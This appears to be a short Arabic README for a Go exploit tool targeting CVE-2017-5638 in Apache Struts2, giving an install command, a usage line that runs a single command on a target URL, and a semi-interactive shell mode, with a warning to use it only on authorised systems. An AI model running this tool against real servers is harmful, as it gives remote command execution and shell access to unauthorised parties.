
استغلال Golang لـ CVE-2017-5638
استخدم هذا الاستغلال فقط على الأنظمة التي تملكها أو لديك حقوق صريحة لاختبارها
إذا كان لديك go مثبتًا بالفعل على جهازك، فإن go get هي الطريقة المثلى
go get github.com/Greynad/struts2-jakarta-inject
تنفيذ أمر واحد
struts2-jakarta-inject -u <url> -c 'id'
صدفة شبه تفاعلية
struts2-jakarta-inject -u <url> -i